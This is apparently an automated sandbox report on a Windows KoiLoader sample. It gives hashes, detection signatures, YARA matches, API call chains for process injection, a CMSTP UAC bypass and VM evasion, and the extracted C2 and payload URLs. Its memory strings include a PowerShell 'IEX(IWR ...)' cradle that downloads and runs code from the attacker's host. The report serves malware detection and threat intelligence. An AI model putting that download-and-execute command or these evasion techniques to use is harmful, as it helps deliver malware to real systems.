Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe
Analysis ID:	1541791
MD5:	9e70e823876c7e83bf254d1f8fcbb3e5
SHA1:	dba226d7c283e53478e3f0b02b1ec8a8260dea57
SHA256:	fe75dacf62cfc6a628f60b49a8c670c55d3ab06ec825ea7d35b132bc8951626e
Tags:	exe
Infos:

Detection

KoiLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Contains functionality to bypass UAC (CMSTPLUA)

Detected unpacking (creates a PE file in dynamic memory)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected KoiLoader

Yara detected UAC Bypass using CMSTP

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contain functionality to detect virtual machines

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to inject code into remote processes

Found evasive API chain (may stop execution after checking mutex)

Machine Learning detection for sample

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Program does not show much activity (idle)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe (PID: 7376 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe" MD5: 9E70E823876C7E83BF254D1F8FCBB3E5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Koi Loader		No Attribution	https://www.esentire.com/blog/unraveling-not-azorult-but-koi-loader-a-precursor-to-koi-stealer	https://malpedia.caad.fkie.fraunhofer.de/details/win.koiloader

Malware Configuration

Threatname: KoiLoader

{"C2": "http://217.195.153.196/academy.php", "Payload url": "http://217.195.153.196/assets"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_KoiLoader_1	Yara detected KoiLoader	Joe Security
00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000000.00000002.1809713648.000000000121E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_KoiLoader_1	Yara detected KoiLoader	Joe Security
00000000.00000002.1809713648.000000000121E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe PID: 7376	JoeSecurity_KoiLoader_1	Yara detected KoiLoader	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe PID: 7376	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1241c70.2.unpack	JoeSecurity_KoiLoader_1	Yara detected KoiLoader	Joe Security
0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1241c70.2.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1090000.1.unpack	JoeSecurity_KoiLoader_1	Yara detected KoiLoader	Joe Security
0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1090000.1.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1090000.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1808:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x9bd6:$s1: CoGetObject
0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1241c70.2.raw.unpack	JoeSecurity_KoiLoader_1	Yara detected KoiLoader	Joe Security
0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1241c70.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1241c70.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1808:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x9bd6:$s1: CoGetObject
Click to see the 3 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe

Avira: detected

Found malware configuration

Source: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: KoiLoader {"C2": "http://217.195.153.196/academy.php", "Payload url": "http://217.195.153.196/assets"}

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Virustotal: Detection: 78%			Perma Link
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	ReversingLabs: Detection: 79%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Code function: 0_2_010992B0 CryptGenRandom,HeapFree,GetProcessHeap,HeapFree,wsprintfA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	0_2_010992B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Code function: 0_2_010986B4 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,	0_2_010986B4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Code function: 0_2_010986D0 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,ExitProcess,	0_2_010986D0

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1241c70.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1090000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1241c70.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1809713648.000000000121E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe PID: 7376, type: MEMORYSTR

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe

Code function: 0_2_010972C0 ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,lstrlenW,ExpandEnvironmentStringsW,GetSystemWow64DirectoryW,GetLastError,wnsprintfW,wnsprintfW,ExpandEnvironmentStringsW,wnsprintfW,SetFileAttributesW,lstrcpyW,GetUserNameW,NetUserGetInfo,NetApiBufferFree,CoInitializeEx,lstrlenW,wsprintfW,CoGetObject,CoUninitialize,

0_2_010972C0

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe

Unpacked PE file: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1090000.1.unpack

Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Code function: 0_2_0015993E FindFirstFileExW,FindNextFileW,FindClose,FindClose,		0_2_0015993E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Code function: 0_2_010989B0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,GetModuleFileNameW,StrStrIW,		0_2_010989B0

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://217.195.153.196/academy.php

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe

Code function: 0_2_01097550 inet_pton,htons,socket,GetProcessHeap,connect,recv,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,GetProcessHeap,recv,closesocket,GetProcessHeap,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,

0_2_01097550

Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	String found in binary or memory: http://217.195.153.196/academy.php
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe, 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe, 00000000.00000002.1809713648.000000000121E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://217.195.153.196/academy.php%temp%
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	String found in binary or memory: http://217.195.153.196/assets
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe, 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe, 00000000.00000002.1809713648.000000000121E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://217.195.153.196/assets/c

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1090000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1241c70.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Code function: 0_2_01095C50 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,		0_2_01095C50
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Code function: 0_2_01095FB0 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTempPathW,wnsprintfW,wnsprintfW,PathCombineW,CreateFileW,WriteFile,WriteFile,SetEndOfFile,SetFilePointer,wnsprintfW,RtlInitUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,GetCurrentProcess,SetFilePointer,WriteFile,FlushFileBuffers,SetEndOfFile,NtQueryInformationProcess,NtClose,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,NtClose,NtClose,NtClose,NtClose,CloseHandle,		0_2_01095FB0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Code function: 0_2_0015FBC1	0_2_0015FBC1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Code function: 0_2_010989B0	0_2_010989B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Code function: 0_2_010943B0	0_2_010943B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Code function: 0_2_010947B0	0_2_010947B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Code function: 0_2_01097BF0	0_2_01097BF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Code function: 0_2_01092690	0_2_01092690
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Code function: 0_2_010976F0	0_2_010976F0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Code function: String function: 001550E0 appears 33 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Code function: String function: 00153CE0 appears 82 times

Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1090000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1241c70.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)

Source: classification engine

Classification label: mal100.troj.expl.evad.winEXE@1/0@0/0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe

Code function: 0_2_01096350 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,

0_2_01096350

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe

Code function: 0_2_01096D30 wnsprintfW,ExpandEnvironmentStringsW,VariantInit,CoCreateInstance,SysAllocString,SysAllocString,SysFreeString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,VariantInit,SysAllocString,SysAllocString,SysFreeString,VariantClear,

0_2_01096D30

Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Virustotal: Detection: 78%
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	ReversingLabs: Detection: 79%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Section loaded: uxtheme.dll	Jump to behavior

Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe

Unpacked PE file: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1090000.1.unpack

Yara detected KoiLoader

Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1241c70.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1090000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1241c70.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1809713648.000000000121E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe PID: 7376, type: MEMORYSTR

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe

Code function: 0_2_00151300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,

0_2_00151300

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe

Code function: 0_2_001602D1 push ecx; ret

0_2_001602E4

Malware Analysis System Evasion

Contain functionality to detect virtual machines

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe

Code function: %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxTray.exe

0_2_010989B0

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe

Code function: EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,GetModuleFileNameW,StrStrIW,

0_2_010989B0

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe

Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

graph_0-12381

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe

File opened / queried: C:\Windows\System32\VBoxService.exe

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe

API coverage: 9.5 %

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Code function: 0_2_0015993E FindFirstFileExW,FindNextFileW,FindClose,FindClose,		0_2_0015993E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Code function: 0_2_010989B0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,GetModuleFileNameW,StrStrIW,		0_2_010989B0

Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Binary or memory string: Hyper-V
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe, 00000000.00000002.1809713648.000000000121E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: POST%s\|%s\|4jdmhuQIStart%d\|%sINITWindowsPowerShell\v1.0\powershell.exe -enc %S /c %Skernel32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionShellExecuteWshell32openReleaseSeShutdownPrivilege%Shttp://217.195.153.196/academy.php%temp%\%paths%%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exesd2.ps1sd4.ps1http://217.195.153.196/assets/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"Hyper-VParallels Display AdapterRed Hat QXL controller%systemroot%\System32\VBoxService.exe%systemroot%\System32\VBoxTray.exe?
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Binary or memory string: %systemroot%\System32\VBoxService.exe
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Binary or memory string: %systemroot%\System32\VBoxTray.exe

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	API call chain: ExitProcess graph end node			graph_0-12384
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	API call chain: ExitProcess graph end node			graph_0-11542

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe

Code function: 0_2_00154E89 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00154E89

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe

